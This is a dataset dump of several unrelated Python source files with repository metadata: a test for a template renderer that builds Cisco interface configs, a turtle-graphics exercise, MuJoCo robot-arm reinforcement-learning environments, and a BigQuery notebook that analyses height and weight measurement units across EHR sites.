"MIT"
] | 5 | 2021-01-27T03:58:04.000Z | 2022-02-06T14:20:26.000Z | test/test_templates_collection.py | dmulyalin/template-text-renderer | f1993b6e8f652d55207b7d0961673dea8e7ffec1 | [
"MIT"
] | 1 | 2021-12-21T15:17:55.000Z | 2021-12-23T07:31:26.000Z | test/test_templates_collection.py | dmulyalin/template-text-renderer | f1993b6e8f652d55207b7d0961673dea8e7ffec1 | [
"MIT"
] | null | null | null | import sys
sys.path.insert(0,'../')
import pprint
from ttr import ttr
def test_loading_template_from_collection():
data = """
- interface: Gi1/1
description: Customer A
vid: 100
ip: 10.0.0.1
mask: 255.255.255.0
vrf: cust_a
template: ttr://simple/interface.cisco_ios.txt
device: rt-1
- interface: Gi1/2
description: Customer C
vid: 300
ip: 10.0.3.1
mask: 255.255.255.0
vrf: cust_c
template: ttr://simple/interface.cisco_ios.txt
device: rt-1
- interface: Gi1/2
description: Customer B
vid: 200
ip: 10.0.2.1
mask: 255.255.255.0
vrf: cust_b
template: ttr://simple/interface.cisco_ios.txt
device: rt-2
"""
generator = ttr(data=data, data_plugin="yaml")
generator.run()
# pprint.pprint(generator.results)
assert generator.results == {'rt-1': 'interface Gi1/1\n'
' description Customer A\n'
' encapsulation dot1q 100\n'
' vrf forwarding cust_a\n'
' ip address 10.0.0.1 255.255.255.0\n'
' exit\n'
'!\n'
'interface Gi1/2\n'
' description Customer C\n'
' encapsulation dot1q 300\n'
' vrf forwarding cust_c\n'
' ip address 10.0.3.1 255.255.255.0\n'
' exit\n'
'!',
'rt-2': 'interface Gi1/2\n'
' description Customer B\n'
' encapsulation dot1q 200\n'
' vrf forwarding cust_b\n'
' ip address 10.0.2.1 255.255.255.0\n'
' exit\n'
'!'}
# test_loading_template_from_collection()
def test_loading_template_from_collection_no_txt_extension():
data = """
- interface: Gi1/1
description: Customer A
vid: 100
ip: 10.0.0.1
mask: 255.255.255.0
vrf: cust_a
template: ttr://simple/interface.cisco_ios
device: rt-1
- interface: Gi1/2
description: Customer B
vid: 200
ip: 10.0.2.1
mask: 255.255.255.0
vrf: cust_b
template: ttr://simple/interface.cisco_ios
device: rt-2
"""
generator = ttr(data=data, data_plugin="yaml")
generator.run()
# pprint.pprint(generator.results)
assert generator.results == {'rt-1': 'interface Gi1/1\n'
' description Customer A\n'
' encapsulation dot1q 100\n'
' vrf forwarding cust_a\n'
' ip address 10.0.0.1 255.255.255.0\n'
' exit\n'
'!',
'rt-2': 'interface Gi1/2\n'
' description Customer B\n'
' encapsulation dot1q 200\n'
' vrf forwarding cust_b\n'
' ip address 10.0.2.1 255.255.255.0\n'
' exit\n'
'!'}
# test_loading_template_from_collection_no_txt_extension() | 36.818182 | 79 | 0.428807 | 386 | 3,645 | 3.948187 | 0.139896 | 0.07874 | 0.059055 | 0.065617 | 0.928478 | 0.919948 | 0.872703 | 0.872703 | 0.818241 | 0.816273 | 0 | 0.112389 | 0.475171 | 3,645 | 99 | 80 | 36.818182 | 0.684266 | 0.044444 | 0 | 0.820225 | 0 | 0 | 0.451567 | 0.049439 | 0 | 0 | 0 | 0 | 0.022472 | 1 | 0.022472 | false | 0 | 0.033708 | 0 | 0.05618 | 0.011236 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d0700c4be68e5a457567c8c5e4bb29e5727be8db | 215 | py | Python | example/test/L4_homework_answer_ide.py | Michael8968/skulpt | 15956a60398fac92ee1dab25bf661ffc003b2eaf | [
"MIT"
] | 2 | 2021-12-18T06:34:26.000Z | 2022-01-05T05:08:47.000Z | example/test/L4_homework_answer_ide.py | Michael8968/skulpt | 15956a60398fac92ee1dab25bf661ffc003b2eaf | [
"MIT"
] | null | null | null | example/test/L4_homework_answer_ide.py | Michael8968/skulpt | 15956a60398fac92ee1dab25bf661ffc003b2eaf | [
"MIT"
] | null | null | null | import turtle
a=int(input("输入你的幸运数: "))
turtle.forward(a/3)
turtle.right(90)
turtle.forward(a/3)
turtle.right(90)
turtle.forward(a/3)
turtle.right(90)
turtle.forward(a/3)
turtle.right(90)
print(a)
turtle.done() | 12.647059 | 25 | 0.725581 | 38 | 215 | 4.105263 | 0.315789 | 0.333333 | 0.358974 | 0.384615 | 0.717949 | 0.717949 | 0.717949 | 0.717949 | 0.717949 | 0.717949 | 0 | 0.060914 | 0.083721 | 215 | 17 | 26 | 12.647059 | 0.730964 | 0 | 0 | 0.666667 | 0 | 0 | 0.041667 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.083333 | 0.083333 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
d08f053f03039c57e8454fe680155ce4c4757d00 | 14,296 | py | Python | softlearning/environments/gym/mujoco/vertical_arm.py | JiazhengChai/synergy_DRL | c08e78e5fe39d9d46213e1bf07b8dafc2195b05a | [
"MIT"
] | 2 | 2020-01-07T04:12:42.000Z | 2021-12-21T22:25:31.000Z | softlearning/environments/gym/mujoco/vertical_arm.py | JiazhengChai/synergy_DRL | c08e78e5fe39d9d46213e1bf07b8dafc2195b05a | [
"MIT"
] | 11 | 2019-11-29T02:59:34.000Z | 2022-03-12T00:07:28.000Z | softlearning/environments/gym/mujoco/vertical_arm.py | JiazhengChai/synergy_DRL | c08e78e5fe39d9d46213e1bf07b8dafc2195b05a | [
"MIT"
] | 1 | 2020-04-28T12:06:40.000Z | 2020-04-28T12:06:40.000Z | import numpy as np
from gym import utils
from gym.envs.mujoco import mujoco_env
import os
from . import path
DEFAULT_CAMERA_CONFIG = {
'trackbodyid': 0,
'distance': 1.0,
'lookat': np.array((0.0, 0.0, 0)),
'elevation': 0,
}
def sin(t,omega=1.5,phi=0.):#1
return np.sin(omega*t+phi)
def cos(t,omega=1.5,phi=0.):#1
return np.cos(omega*t+phi)
class VA(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,xml_file='vertical_arm.xml',
distance_reward_weight=5.0,
ctrl_cost_weight=0.05
):
#utils.EzPickle.__init__(self)
utils.EzPickle.__init__(**locals())
self.joint_list = ['shoulder', 'elbow']
self.real_time=0.01
self.frame_skip=2
self.t=0
self.target_pos = np.asarray([0, 0, 0])
self.distance_reward_weight= distance_reward_weight
self.ctrl_cost_weight= ctrl_cost_weight
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), self.frame_skip)
'''if path is not None:
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), self.frame_skip)
else:
mujoco_env.MujocoEnv.__init__(self, xml_file, self.frame_skip)'''
def step(self, a):
#print(a)
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
vec = self.get_body_com("fingertip")- self.target_pos
reward_dist = - np.linalg.norm(vec)
reward_ctrl =- np.square(a).sum()
reward = self.distance_reward_weight*reward_dist +self.ctrl_cost_weight*reward_ctrl
self.do_simulation(a, self.frame_skip)
self.t += self.frame_skip * self.real_time
self.sim.data.site_xpos[0] = self.sim.data.site_xpos[0] + [-0.15*sin(self.t,phi=0)*np.sin(-25* np.pi / 180.), 0,
0.15*sin(self.t,phi=0)*np.cos(-25* np.pi / 180.)+0.01]#,phi=1
self.target_pos = self.sim.data.site_xpos[0]
ob = self._get_obs()
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(a[i]) * delta_theta
done = False
info = {
'energy': energy,
'reward_dist': self.distance_reward_weight*reward_dist,
'reward_ctrl': self.ctrl_cost_weight*reward_ctrl,
'ori_reward': reward
}
return ob, reward, done, info#,reward_ctrl=reward_ctrl
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
def reset_model(self):
self.t=0
#self.data.site_xpos[0] = [1, 1, 1] -.15 0.01 -.1
qpos = self.np_random.uniform(low=-0.1, high=0.1, size=self.model.nq) + self.init_qpos
qvel = self.init_qvel + self.np_random.uniform(low=-.005, high=.005, size=self.model.nv)
self.set_state(qpos, qvel)
self.target_pos = self.data.site_xpos[0]
return self._get_obs()
def _get_obs(self):
theta = self.sim.data.qpos.flat[:2]
return np.concatenate([
np.cos(theta),
np.sin(theta),
self.sim.data.qpos.flat[2:],
self.sim.data.qvel.flat[:2],
[self.get_body_com("fingertip")[0] - self.target_pos[0]],
[self.get_body_com("fingertip")[2] - self.target_pos[2]]
]).ravel()
class VA4dof(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,xml_file='vertical_arm4dof.xml',
distance_reward_weight=5.0,
ctrl_cost_weight=0.05
):
#utils.EzPickle.__init__(self)
utils.EzPickle.__init__(**locals())
self.joint_list = ['shoulder','shoulder2', 'elbow', 'elbow2']
self.real_time=0.01
self.frame_skip=2
self.t=0
self.target_pos = np.asarray([0, 0, 0])
self.distance_reward_weight= distance_reward_weight
self.ctrl_cost_weight= ctrl_cost_weight
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), self.frame_skip)
'''if path is not None:
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), self.frame_skip)
else:
mujoco_env.MujocoEnv.__init__(self, xml_file, self.frame_skip)'''
def step(self, a):
#print(a)
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
vec = self.get_body_com("fingertip")- self.target_pos
reward_dist = - np.linalg.norm(vec)
reward_ctrl =- np.square(a).sum()
reward = self.distance_reward_weight*reward_dist +self.ctrl_cost_weight*reward_ctrl
self.do_simulation(a, self.frame_skip)
self.t += self.frame_skip * self.real_time
self.sim.data.site_xpos[0] = self.sim.data.site_xpos[0] + [-0.15*sin(self.t,phi=0)*np.sin(-25* np.pi / 180.), 0,
0.15*sin(self.t,phi=0)*np.cos(-25* np.pi / 180.)+0.01]#,phi=1
self.target_pos = self.sim.data.site_xpos[0]
ob = self._get_obs()
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(a[i]) * delta_theta
done = False
info = {
'energy': energy,
'reward_dist': self.distance_reward_weight*reward_dist,
'reward_ctrl': self.ctrl_cost_weight*reward_ctrl,
'ori_reward': reward
}
return ob, reward, done, info#,reward_ctrl=reward_ctrl
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
def reset_model(self):
self.t=0
#self.data.site_xpos[0] = [1, 1, 1] -.15 0.01 -.1
qpos = self.np_random.uniform(low=-0.1, high=0.1, size=self.model.nq) + self.init_qpos
qvel = self.init_qvel + self.np_random.uniform(low=-.005, high=.005, size=self.model.nv)
self.set_state(qpos, qvel)
self.target_pos = self.data.site_xpos[0]
return self._get_obs()
def _get_obs(self):
theta = self.sim.data.qpos.flat[:4]
return np.concatenate([
np.cos(theta),
np.sin(theta),
self.sim.data.qpos.flat[4:],
self.sim.data.qvel.flat[:4],
[self.get_body_com("fingertip")[0] - self.target_pos[0]],
[self.get_body_com("fingertip")[2] - self.target_pos[2]]
]).ravel()
class VA6dof(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,xml_file='vertical_arm6dof.xml',
distance_reward_weight=5.0,
ctrl_cost_weight=0.05
):
#utils.EzPickle.__init__(self)
utils.EzPickle.__init__(**locals())
self.joint_list = ['shoulder','shoulder2', 'elbow', 'elbow2','elbow3', 'elbow4']
self.real_time=0.01
self.frame_skip=2
self.t=0
self.target_pos = np.asarray([0, 0, 0])
self.distance_reward_weight= distance_reward_weight
self.ctrl_cost_weight= ctrl_cost_weight
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), self.frame_skip)
'''if path is not None:
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), self.frame_skip)
else:
mujoco_env.MujocoEnv.__init__(self, xml_file, self.frame_skip)'''
def step(self, a):
#print(a)
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
vec = self.get_body_com("fingertip")- self.target_pos
reward_dist = - np.linalg.norm(vec)
reward_ctrl =- np.square(a).sum()
reward = self.distance_reward_weight*reward_dist +self.ctrl_cost_weight*reward_ctrl
self.do_simulation(a, self.frame_skip)
self.t += self.frame_skip * self.real_time
self.sim.data.site_xpos[0] = self.sim.data.site_xpos[0] + [-0.15*sin(self.t,phi=0)*np.sin(-25* np.pi / 180.), 0,
0.15*sin(self.t,phi=0)*np.cos(-25* np.pi / 180.)+0.01]#,phi=1
self.target_pos = self.sim.data.site_xpos[0]
ob = self._get_obs()
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(a[i]) * delta_theta
done = False
info = {
'energy': energy,
'reward_dist': self.distance_reward_weight*reward_dist,
'reward_ctrl': self.ctrl_cost_weight*reward_ctrl,
'ori_reward': reward
}
return ob, reward, done, info#,reward_ctrl=reward_ctrl
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
def reset_model(self):
self.t=0
#self.data.site_xpos[0] = [1, 1, 1] -.15 0.01 -.1
qpos = self.np_random.uniform(low=-0.1, high=0.1, size=self.model.nq) + self.init_qpos
qvel = self.init_qvel + self.np_random.uniform(low=-.005, high=.005, size=self.model.nv)
self.set_state(qpos, qvel)
self.target_pos = self.data.site_xpos[0]
return self._get_obs()
def _get_obs(self):
theta = self.sim.data.qpos.flat[:6]
return np.concatenate([
np.cos(theta),
np.sin(theta),
self.sim.data.qpos.flat[6:],
self.sim.data.qvel.flat[:6],
[self.get_body_com("fingertip")[0] - self.target_pos[0]],
[self.get_body_com("fingertip")[2] - self.target_pos[2]]
]).ravel()
class VA8dof(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,xml_file='vertical_arm8dof.xml',
distance_reward_weight=5.0,
ctrl_cost_weight=0.05
):
#utils.EzPickle.__init__(self)
utils.EzPickle.__init__(**locals())
self.joint_list = ['shoulder','shoulder2', 'shoulder3','shoulder4','elbow', 'elbow2','elbow3', 'elbow4']
self.real_time=0.01
self.frame_skip=2
self.t=0
self.target_pos = np.asarray([0, 0, 0])
self.distance_reward_weight= distance_reward_weight
self.ctrl_cost_weight= ctrl_cost_weight
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), self.frame_skip)
'''if path is not None:
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), self.frame_skip)
else:
mujoco_env.MujocoEnv.__init__(self, xml_file, self.frame_skip)'''
def step(self, a):
#print(a)
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
vec = self.get_body_com("fingertip")- self.target_pos
reward_dist = - np.linalg.norm(vec)
reward_ctrl =- np.square(a).sum()
reward = self.distance_reward_weight*reward_dist +self.ctrl_cost_weight*reward_ctrl
self.do_simulation(a, self.frame_skip)
self.t += self.frame_skip * self.real_time
self.sim.data.site_xpos[0] = self.sim.data.site_xpos[0] + [-0.15*sin(self.t,phi=0)*np.sin(-25* np.pi / 180.), 0,
0.15*sin(self.t,phi=0)*np.cos(-25* np.pi / 180.)+0.01]#,phi=1
self.target_pos = self.sim.data.site_xpos[0]
ob = self._get_obs()
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(a[i]) * delta_theta
done = False
info = {
'energy': energy,
'reward_dist': self.distance_reward_weight*reward_dist,
'reward_ctrl': self.ctrl_cost_weight*reward_ctrl,
'ori_reward': reward
}
return ob, reward, done, info#,reward_ctrl=reward_ctrl
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
def reset_model(self):
self.t=0
#self.data.site_xpos[0] = [1, 1, 1] -.15 0.01 -.1
qpos = self.np_random.uniform(low=-0.1, high=0.1, size=self.model.nq) + self.init_qpos
qvel = self.init_qvel + self.np_random.uniform(low=-.005, high=.005, size=self.model.nv)
self.set_state(qpos, qvel)
self.target_pos = self.data.site_xpos[0]
return self._get_obs()
def _get_obs(self):
theta = self.sim.data.qpos.flat[:8]
return np.concatenate([
np.cos(theta),
np.sin(theta),
self.sim.data.qpos.flat[8:],
self.sim.data.qvel.flat[:8],
[self.get_body_com("fingertip")[0] - self.target_pos[0]],
[self.get_body_com("fingertip")[2] - self.target_pos[2]]
]).ravel()
| 35.650873 | 128 | 0.588137 | 2,008 | 14,296 | 3.938745 | 0.075199 | 0.028322 | 0.044506 | 0.032874 | 0.966115 | 0.956505 | 0.956505 | 0.955494 | 0.955494 | 0.950183 | 0 | 0.030095 | 0.27714 | 14,296 | 400 | 129 | 35.74 | 0.735243 | 0.032317 | 0 | 0.848057 | 0 | 0 | 0.039238 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.077739 | false | 0 | 0.017668 | 0.007067 | 0.159011 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d0c3a0dddb5cd8e9776c7bb70f09287f9966f75b | 9,939 | py | Python | data_steward/analytics/cdr_ops/ad_hoc_analyses/height_weight_analyses.py | lrwb-aou/curation | e80447e56d269dc2c9c8bc79e78218d4b0dc504c | [
"MIT"
] | 16 | 2017-06-30T20:05:05.000Z | 2022-03-08T21:03:19.000Z | data_steward/analytics/cdr_ops/ad_hoc_analyses/height_weight_analyses.py | lrwb-aou/curation | e80447e56d269dc2c9c8bc79e78218d4b0dc504c | [
"MIT"
] | 342 | 2017-06-23T21:37:40.000Z | 2022-03-30T16:44:16.000Z | data_steward/analytics/cdr_ops/ad_hoc_analyses/height_weight_analyses.py | lrwb-aou/curation | e80447e56d269dc2c9c8bc79e78218d4b0dc504c | [
"MIT"
] | 33 | 2017-07-01T00:12:20.000Z | 2022-01-26T18:06:53.000Z | # ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.4.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## This notebook is intended to gather information about the different sites for selected height and weight concept_IDs. This may allow us to better identify cleaning rules that could be implemented or sites with which we must correspond
from google.cloud import bigquery
client = bigquery.Client()
# %load_ext google.cloud.bigquery
# %matplotlib inline
import pandas as pd
from notebooks import parameters
DATASET = parameters.LATEST_DATASET
# +
import os
cwd = os.getcwd()
cwd = str(cwd)
print("Current working directory is: {cwd}".format(cwd=cwd))
# +
to_print = f"Dataset to use: {DATASET}"
print(to_print)
# -
# ## First - let's see what unit_concept_ids sites are using for each of the concept_ids
height_unit_distribution_query = f"""
SELECT
DISTINCT
m.measurement_concept_id, c.concept_name as measurement_concept,
m.unit_concept_id, c2.concept_name as unit_concept, c2.standard_concept as unit_standard_concept,
COUNT(*) as count
FROM
`{DATASET}.unioned_ehr_measurement` m
JOIN
`{DATASET}.concept` c
ON
m.measurement_concept_id = c.concept_id
JOIN
`{DATASET}.concept` c2
ON
m.unit_concept_id = c2.concept_id
WHERE
m.measurement_concept_id IN (3036277, 3023540, 3019171)
GROUP BY 1, 2, 3, 4, 5
ORDER BY count DESC
"""
height_unit_distribution = pd.io.gbq.read_gbq(height_unit_distribution_query, dialect='standard')
height_unit_distribution
weight_unit_distribution_query = f"""
SELECT
DISTINCT
m.measurement_concept_id, c.concept_name as measurement_concept,
m.unit_concept_id, c2.concept_name as unit_concept, c2.standard_concept as unit_standard_concept,
COUNT(*) as count
FROM
`{DATASET}.unioned_ehr_measurement` m
JOIN
`{DATASET}.concept` c
ON
m.measurement_concept_id = c.concept_id
JOIN
`{DATASET}.concept` c2
ON
m.unit_concept_id = c2.concept_id
WHERE
m.measurement_concept_id IN (3025315, 3013762, 3023166)
GROUP BY 1, 2, 3, 4, 5
ORDER BY count DESC
"""
weight_unit_distribution = pd.io.gbq.read_gbq(weight_unit_distribution_query, dialect='standard')
weight_unit_distribution
# ### Want to see if any site uses > 1 unit_concept_id for the same measurement_concept_id
units_used_per_site_query = f"""
SELECT
DISTINCT
mm.src_hpo_id,
m.measurement_concept_id, c.concept_name as measurement_concept,
COUNT(DISTINCT m.unit_concept_id) as num_units_used
FROM
`{DATASET}.unioned_ehr_measurement` m
JOIN
`{DATASET}._mapping_measurement` mm
ON
m.measurement_id = mm.measurement_id
JOIN
`{DATASET}.concept` c
ON
m.measurement_concept_id = c.concept_id
WHERE
m.measurement_concept_id IN (3025315, 3013762, 3023166, 3036277, 3023540, 3019171)
GROUP BY 1, 2, 3
ORDER BY num_units_used DESC
"""
units_used_per_site = pd.io.gbq.read_gbq(units_used_per_site_query, dialect='standard')
units_used_per_site
# ## Now ascertaining the data for each site - will include the number of unit_concept_ids used as well just to show any potential reasons for a large range
height_distribution_by_site_query = f"""
SELECT
DISTINCT
mm.src_hpo_id,
m.measurement_concept_id, c.concept_name as measurement_concept,
ROUND(MIN(m.value_as_number) OVER (PARTITION BY mm.src_hpo_id), 2) as min,
ROUND(MAX(m.value_as_number) OVER (PARTITION BY mm.src_hpo_id), 2) as max,
ROUND(AVG(m.value_as_number) OVER (PARTITION BY mm.src_hpo_id), 2) as mean,
ROUND(STDDEV_POP(m.value_as_number) OVER (PARTITION BY mm.src_hpo_id), 2) as stdev,
COUNT(m.measurement_id) OVER (PARTITION BY mm.src_hpo_id) as num_rows
FROM
`{DATASET}.unioned_ehr_measurement` m
JOIN
`{DATASET}._mapping_measurement` mm
ON
m.measurement_id = mm.measurement_id
JOIN
`{DATASET}.concept` c
ON
m.measurement_concept_id = c.concept_id
WHERE
m.measurement_concept_id IN (3036277, 3023540, 3019171)
GROUP BY mm.src_hpo_id, m.measurement_concept_id, c.concept_name, m.value_as_number, m.measurement_id
ORDER BY measurement_concept_id DESC, mean DESC
"""
height_distribution_by_site = pd.io.gbq.read_gbq(height_distribution_by_site_query, dialect='standard')
# +
temp_df = units_used_per_site[['src_hpo_id', 'measurement_concept_id', 'num_units_used']]
matching_cols = ['src_hpo_id', 'measurement_concept_id']
height_distribution_by_site = height_distribution_by_site.merge(temp_df, on=matching_cols)
# -
height_distribution_by_site
height_distribution_by_site.to_csv(f"{cwd}/height_analysis_by_site.csv")
weight_distribution_by_site_query = f"""
SELECT
DISTINCT
mm.src_hpo_id,
m.measurement_concept_id, c.concept_name as measurement_concept,
ROUND(MIN(m.value_as_number) OVER (PARTITION BY mm.src_hpo_id), 2) as min,
ROUND(MAX(m.value_as_number) OVER (PARTITION BY mm.src_hpo_id), 2) as max,
ROUND(AVG(m.value_as_number) OVER (PARTITION BY mm.src_hpo_id), 2) as mean,
ROUND(STDDEV_POP(m.value_as_number) OVER (PARTITION BY mm.src_hpo_id), 2) as stdev,
COUNT(m.measurement_id) OVER (PARTITION BY mm.src_hpo_id) as num_rows
FROM
`{DATASET}.unioned_ehr_measurement` m
JOIN
`{DATASET}._mapping_measurement` mm
ON
m.measurement_id = mm.measurement_id
JOIN
`{DATASET}.concept` c
ON
m.measurement_concept_id = c.concept_id
WHERE
m.measurement_concept_id IN (3025315, 3013762, 3023166)
GROUP BY mm.src_hpo_id, m.measurement_concept_id, c.concept_name, m.value_as_number, m.measurement_id
ORDER BY measurement_concept_id DESC, mean DESC
"""
weight_distribution_by_site = pd.io.gbq.read_gbq(weight_distribution_by_site_query, dialect='standard')
# +
temp_df = units_used_per_site[['src_hpo_id', 'measurement_concept_id', 'num_units_used']]
matching_cols = ['src_hpo_id', 'measurement_concept_id']
weight_distribution_by_site = weight_distribution_by_site.merge(temp_df, on=matching_cols)
# -
weight_distribution_by_site.to_csv(f"{cwd}/weight_analysis_by_site.csv")
weight_distribution_by_site
# ## Want to determine the number of sites / unit
all_unit_df = weight_unit_distribution.append(height_unit_distribution)
all_units = set(all_unit_df['unit_concept_id'].tolist())
all_units = list(all_units)
unit_concept_ids_as_str = str(all_units).strip('[]')
sites_per_unit_query = f"""
SELECT
DISTINCT
m.unit_concept_id, c.concept_name as unit_concept_name,
COUNT(DISTINCT mm.src_hpo_id) as num_sites,
FROM
`{DATASET}.unioned_ehr_measurement` m
JOIN
`{DATASET}.concept` c
ON
m.unit_concept_id = c.concept_id
JOIN
`{DATASET}._mapping_measurement` mm
ON
m.measurement_id = mm.measurement_id
WHERE
m.unit_concept_id IN ({unit_concept_ids_as_str})
GROUP BY m.unit_concept_id, c.concept_name
ORDER BY num_sites DESC
"""
sites_per_unit = pd.io.gbq.read_gbq(sites_per_unit_query, dialect='standard')
sites_per_unit
# ## Now let's look at the variance for the height/weight based on the unit_concept_id
height_distribution_by_unit_query = f"""
SELECT
DISTINCT
m.unit_concept_id, c2.concept_name as unit_name, c2.standard_concept as unit_standard_concept,
m.measurement_concept_id, c.concept_name as measurement_concept,
ROUND(MIN(m.value_as_number) OVER (PARTITION BY m.unit_concept_id), 2) as min,
ROUND(MAX(m.value_as_number) OVER (PARTITION BY m.unit_concept_id), 2) as max,
ROUND(AVG(m.value_as_number) OVER (PARTITION BY m.unit_concept_id), 2) as mean,
ROUND(STDDEV_POP(m.value_as_number) OVER (PARTITION BY m.unit_concept_id), 2) as stdev,
COUNT(m.measurement_id) OVER (PARTITION BY m.unit_concept_id) as num_rows
FROM
`{DATASET}.unioned_ehr_measurement` m
JOIN
`{DATASET}.concept` c
ON
m.measurement_concept_id = c.concept_id
JOIN
`{DATASET}.concept` c2
ON
m.unit_concept_id = c2.concept_id
JOIN
`{DATASET}._mapping_measurement` mm
ON
m.measurement_id = mm.measurement_id
WHERE
m.measurement_concept_id IN (3036277, 3023540, 3019171)
GROUP BY m.unit_concept_id, c2.concept_name, c2.standard_concept,
m.measurement_concept_id, c.concept_name, m.value_as_number, m.measurement_id
ORDER BY unit_concept_id DESC, mean DESC
"""
height_distribution_by_unit = pd.io.gbq.read_gbq(height_distribution_by_unit_query, dialect='standard')
# +
temp_df = sites_per_unit[['unit_concept_id', 'num_sites']]
matching_cols = ['unit_concept_id']
height_distribution_by_unit = height_distribution_by_unit.merge(temp_df, on=matching_cols)
# -
height_distribution_by_unit.to_csv(f"{cwd}/height_analysis_by_unit.csv")
height_distribution_by_unit
weight_distribution_by_unit_query = f"""
SELECT
DISTINCT
m.unit_concept_id, c2.concept_name as unit_name, c2.standard_concept as unit_standard_concept,
m.measurement_concept_id, c.concept_name as measurement_concept,
ROUND(MIN(m.value_as_number) OVER (PARTITION BY m.unit_concept_id), 2) as min,
ROUND(MAX(m.value_as_number) OVER (PARTITION BY m.unit_concept_id), 2) as max,
ROUND(AVG(m.value_as_number) OVER (PARTITION BY m.unit_concept_id), 2) as mean,
ROUND(STDDEV_POP(m.value_as_number) OVER (PARTITION BY m.unit_concept_id), 2) as stdev,
COUNT(m.measurement_id) OVER (PARTITION BY m.unit_concept_id) as num_rows
FROM
`{DATASET}.unioned_ehr_measurement` m
JOIN
`{DATASET}.concept` c
ON
m.measurement_concept_id = c.concept_id
JOIN
`{DATASET}.concept` c2
ON
m.unit_concept_id = c2.concept_id
JOIN
`{DATASET}._mapping_measurement` mm
ON
m.measurement_id = mm.measurement_id
WHERE
m.measurement_concept_id IN (3025315, 3013762, 3023166)
GROUP BY m.unit_concept_id, c2.concept_name, c2.standard_concept,
m.measurement_concept_id, c.concept_name, m.value_as_number,
m.measurement_id
ORDER BY unit_concept_id DESC, mean DESC
"""
weight_distribution_by_unit = pd.io.gbq.read_gbq(weight_distribution_by_unit_query, dialect='standard')
# +
temp_df = sites_per_unit[['unit_concept_id', 'num_sites']]
matching_cols = ['unit_concept_id']
weight_distribution_by_unit = weight_distribution_by_unit.merge(temp_df, on=matching_cols)
# -
weight_distribution_by_unit.to_csv(f"{cwd}/weight_analysis_by_unit.csv")
weight_distribution_by_unit
